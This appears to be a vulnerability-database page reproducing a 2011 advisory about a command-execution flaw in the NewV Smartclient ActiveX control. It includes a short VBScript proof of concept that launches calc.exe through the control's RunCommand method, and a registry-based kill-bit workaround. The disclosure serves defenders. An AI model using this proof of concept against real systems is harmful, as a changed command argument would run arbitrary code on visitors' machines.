Lucene search
K

NewV Smartclient 1.0.0.18 Command Execution

🗓️ 10 Jan 2011 00:00:00Reported by Yu GuoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

NewV Smartclient 1.0.0.18 Command Execution vulnerability, High risk, Not Fixe

Code
`Vendor: NewV ( http:// www.newv.com.cn/ )   
Product: NewV smartclient   
(http://demo.newv.com.cn/lds/module/smartclientsetting.exe)  
Vulnerable Version: 1.0.0.18  
Status: Not Fixed, Vendor Alerted  
Risk level: High   
Credit: Yu Guo(yuguo.cn#gmail.com)  
  
Description:  
An input validation issue exists in the NewV ActiveX Control.   
The Runcommand attribute may allow attacker to run arbitrary command remotely.  
  
POC:  
<html>  
<head>  
<script language='vbscript'>  
arg1 = "calc.exe"  
</script>  
</head>  
<object classid='clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9' id='target' />  
</object>  
<script language='vbscript'>  
target.RunCommand arg1   
</script>  
</html>  
  
Workaround:  
Set the Killbit for NewV CLSID’s:  
{0B68B7EB-02FF-4A41-BC14-3C303BB853F9}  
  
.Reg file:  
  
Windows Registry Editor Version 5.00  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\ActiveX Compatibility\{0B68B7EB-02FF-4A41-BC14-3C303BB853F9}]  
"Compatibility Flags"=dword:00000400  
  
-EOF-  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation